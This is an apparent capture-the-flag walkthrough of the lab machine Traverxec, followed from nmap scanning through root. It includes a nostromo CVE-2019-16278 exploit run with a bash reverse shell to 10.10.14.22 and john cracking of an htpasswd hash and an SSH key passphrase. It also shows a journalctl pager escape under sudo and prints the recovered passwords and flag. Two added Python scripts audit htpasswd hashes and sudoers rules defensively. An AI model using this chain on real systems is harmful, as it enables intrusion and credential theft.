traverxec Writeup

🌐 Environment

Element           Details
IP address        10.10.10.165
Operating System  Debian GNU/Linux 10 (buster)
User/Group        user / www-data
Network           VLAN-10 / NAT / Host-only

🧪 Procedure

We check connection with the victim machine.

ping -c2 10.10.10.165
PING 10.10.10.165 (10.10.10.165) 56(84) bytes of data.
64 bytes from 10.10.10.165: icmp_seq=1 ttl=63 time=90.1 ms
64 bytes from 10.10.10.165: icmp_seq=2 ttl=63 time=89.9 ms

--- 10.10.10.165 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 89.927/90.025/90.123/0.098 ms

Now we look at the TTL to tell whether we are facing a Windows or a Linux machine: it is 63, so this is a Linux machine.

To keep everything organized, the first thing we always do is create a folder in our working environment named after the machine.
Once it is created, we move into that folder and run the [[mkt]] command.

1️⃣ Enumeration

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.165 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 23:07 BST
Initiating SYN Stealth Scan at 23:07
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Completed SYN Stealth Scan at 23:07, 26.39s elapsed (65535 total ports)
Nmap scan report for 10.10.10.165
Host is up, received user-set (0.089s latency).
Scanned at 2025-06-22 23:07:30 BST for 26s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.45 seconds
           Raw packets sent: 131087 (5.768MB) | Rcvd: 21 (924B)

Once we have the scan, we extract all the open ports by running the [[extactPorts]] command.

With the ports in hand we run

nmap -p22,80 -sCV 10.10.10.165 -oN targered
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 23:08 BST
Nmap scan report for 10.10.10.165
Host is up (0.089s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.21 seconds

Meanwhile, we run whatweb against port 80 to fingerprint the web server.

whatweb http://10.10.10.165
http://10.10.10.165 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[nostromo 1.9.6], IP[10.10.10.165], JQuery, Script, Title[TRAVERXEC]

There is a known CVE for nostromo 1.9.6 (CVE-2019-16278).
We download this simple script: https://www.exploit-db.com/exploits/47837

#We execute the script
python2 CVE-2019-16278.py 10.10.10.165 80 'bash -c "bash -i >&/dev/tcp/10.10.14.22/443 0>&1"'


#We get the shell
nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.165] 34972
bash: cannot set terminal process group (534): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ whoami
whoami
www-data
www-data@traverxec:/usr/bin$

TTY treatment (to get a fully interactive shell):

script /dev/null -c bash
Ctrl+Z   (suspend the shell)
stty raw -echo; fg
reset xterm
export TERM=xterm
stty rows 55 columns 236

After the usual first checks (sudo -l, SUID files, etc.), and since this is the first time I have seen this server, I look for index files to locate the web application's files.

find / -type f -name "index.*" 2>/dev/null
/usr/share/doc/python3/python-policy.html/index.html
/usr/share/doc/shared-mime-info/shared-mime-info-spec.html/index.html
/usr/share/doc/debian/FAQ/index.en.html
/usr/share/doc/adduser/examples/adduser.local.conf.examples/skel.other/index.html
/var/nostromo/htdocs/index.html
/var/cache/man/index.db
/var/cache/man/nl/index.db
/var/cache/man/pt_BR/index.db
/var/cache/man/ru/index.db
/var/cache/man/zh_CN/index.db
/var/cache/man/de/index.db
/var/cache/man/id/index.db
/var/cache/man/sv/index.db
/var/cache/man/zh_TW/index.db
/var/cache/man/ko/index.db
/var/cache/man/da/index.db

Here we see the application path: /var/nostromo/htdocs/index.html. Let's see what we find there.
In the conf directory we see the following.

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www
www-data@traverxec:/var/nostromo/conf$ 

#We see what it contains
cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Let’s crack it by brute force.

echo 'david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > htpasswd.hash
john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd.hash
john --show htpasswd.hash

We have found the password Nowonly4me.
The issue is that this password does not let us switch to the user david.
We have also seen in the config the public_www directory, which must live in /home/david.
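Before moving on, a defender-side check on the .htpasswd entry above. The following Python script is an added example and is not part of the original writeup or of nostromo: it parses htpasswd-style lines, identifies the hash scheme from its prefix, and flags the legacy schemes (MD5-crypt `$1$`, Apache `$apr1$`, `{SHA}`, DES crypt or plaintext) that rockyou-speed wordlist attacks like the one above go through quickly. The david line is the one from the box; the other sample users and their hashes are constructed to show how the stronger schemes are classified.

```python
import re
from dataclasses import dataclass

# Constructed sample .htpasswd. The david entry is the one recovered on the box;
# alice, bob and carol (and their hash values) are made up for illustration.
SAMPLE_HTPASSWD = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
# comment lines and blank lines are ignored

alice:$2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ012345678
bob:{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M=
carol:$6$saltsalt$hashhashhashhash
"""

# (prefix pattern, scheme name, considered weak?) checked in order.
SCHEMES = [
    (re.compile(r"^\$2[aby]\$\d{2}\$"), "bcrypt", False),
    (re.compile(r"^\$6\$"), "sha512-crypt", False),
    (re.compile(r"^\$5\$"), "sha256-crypt", False),
    (re.compile(r"^\$apr1\$"), "apr1-md5", True),
    # $1$<salt up to 8 chars>$<22-char base64-ish digest>
    (re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$"), "md5-crypt", True),
    (re.compile(r"^\{SHA\}"), "sha1", True),
]


@dataclass
class Entry:
    user: str
    scheme: str
    weak: bool


def classify_hash(h: str):
    """Return (scheme, weak) for one htpasswd hash field."""
    for pattern, name, weak in SCHEMES:
        if pattern.match(h):
            return name, weak
    # A bare 13-char crypt string is traditional DES crypt; anything else is
    # treated as a plaintext password, which is the worst case.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", h):
        return "des-crypt", True
    return "plaintext", True


def parse_htpasswd(text: str):
    """Parse user:hash lines, skipping comments and blanks."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: expected user:hash")
        user, h = line.split(":", 1)
        scheme, weak = classify_hash(h)
        entries.append(Entry(user, scheme, weak))
    return entries


def weak_entries(text: str):
    """Entries that should be re-hashed with bcrypt or sha512-crypt."""
    return [e for e in parse_htpasswd(text) if e.weak]


if __name__ == "__main__":
    for e in parse_htpasswd(SAMPLE_HTPASSWD):
        print(f"{e.user:8s} {e.scheme:13s} {'WEAK' if e.weak else 'ok'}")
```

Run it against a real file with `parse_htpasswd(open(path).read())`; any `WEAK` line is a candidate for re-hashing and, as here, for checking whether the same password is reused for a system account.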

www-data@traverxec:/etc/ssh$ ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area

www-data@traverxec:/etc/ssh$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz

We have read permission on what appears to be a backup of SSH keys. We copy it to /tmp.

www-data@traverxec:/etc/ssh$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz /tmp

www-data@traverxec:/tmp$ tar -xvzf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/tmp$

We copy the id_rsa to our attacking host and give it permissions 600.

ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':

We are going to crack the id_rsa passphrase, since the password Nowonly4me does not work for it.

└─# locate ssh2john.py
/usr/share/john/ssh2john.py

┌──(root㉿jprhack)-[/home/jesushack/Hacking/hatthebox/ease/linux/traverxec/exploits]
└─# python2 /usr/share/john/ssh2john.py id_rsa > hash

┌──(root㉿jprhack)-[/home/jesushack/Hacking/hatthebox/ease/linux/traverxec/exploits]
└─# john -w:/usr/share/wordlists/rockyou.txt hash

We have discovered the passphrase: hunter

david@traverxec:~$ cat user.txt
c17612caad852f820df64a8ea0e376e4

We see a script called server-stats.sh in the /home/david/bin directory.
Let's see what it contains:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

A priori it runs every command with an absolute path, but it uses sudo to run /usr/bin/journalctl.
Inside the script the output is piped to cat, so no pager appears; if we run that same sudo command directly on a terminal, journalctl hands the output to its pager (less) as root.
If we go to https://gtfobins.github.io/gtfobins/journalctl/ we see that we can launch a privileged shell from there.
Watch out!! I have resized my window to make it very small so that journalctl goes into pagination mode and I can insert the command.
Now I run

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2025-06-22 17:59:53 EDT, end at Mo
Jun 23 07:58:13 traverxec crontab[1155]: (www-data) LIS
Jun 23 08:19:27 traverxec su[1199]: pam_unix(su:auth):
Jun 23 08:19:29 traverxec su[1199]: FAILED SU (to david
Jun 23 08:19:59 traverxec su[1200]: pam_unix(su:auth):
Jun 23 08:20:01 traverxec su[1200]: FAILED SU (to david
!/bin/bash
root@traverxec:/home/david/bin#
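The root cause is the sudo rule rather than the script: any rule that lets a user run journalctl as root without `--no-pager` hands them a root pager. The following Python script is an added example, not part of the original writeup, that audits sudoers-style rules for this weakness. The `david` rule in the sample is an assumption of what granted the sudo right on the box (the writeup does not show the `sudo -l` output); the second `david` line is the tightened form, and the `ops` rule is constructed. It goes slightly beyond the page by also covering `systemctl status`, which pages output the same way, and by flagging wildcard arguments, which let the caller add any flag.

```python
import re
import shlex

# Commands that open $PAGER (less by default) when stdout is a terminal,
# unless they are told not to with --no-pager.
PAGER_COMMANDS = {"journalctl", "systemctl"}

# Constructed sample /etc/sudoers fragment. The first david rule is our
# assumption of what allowed `sudo /usr/bin/journalctl -n5 -unostromo.service`;
# the second is the safe form; the ops rule is made up to show a wildcard.
SAMPLE_SUDOERS = """\
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
ops   ALL=(ALL)  NOPASSWD: /usr/bin/systemctl status *
"""

# user  host=(runas)  TAG:  cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text: str):
    """Yield (user, command) pairs from sudoers user-specification lines."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("user"), cmd.strip()))
    return rules


def audit_rule(user: str, cmd: str):
    """Return a finding if this rule can reach a pager as root, else None."""
    argv = shlex.split(cmd)
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog not in PAGER_COMMANDS:
        return None
    if "*" in argv[1:]:
        return f"{user}: {cmd!r} uses a wildcard, so any flag (and the pager) is allowed"
    if "--no-pager" not in argv[1:]:
        return f"{user}: {cmd!r} may spawn a pager as root; require --no-pager in the rule"
    return None


def audit_sudoers(text: str):
    """All findings for a sudoers fragment, in file order."""
    findings = []
    for user, cmd in parse_rules(text):
        f = audit_rule(user, cmd)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Because sudoers matches the argument list literally, a rule that includes `--no-pager` only ever permits that exact invocation, so the pager can never be reached through it; the cleaner fix is to grant read access to the journal (the systemd-journal group) instead of sudo at all.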
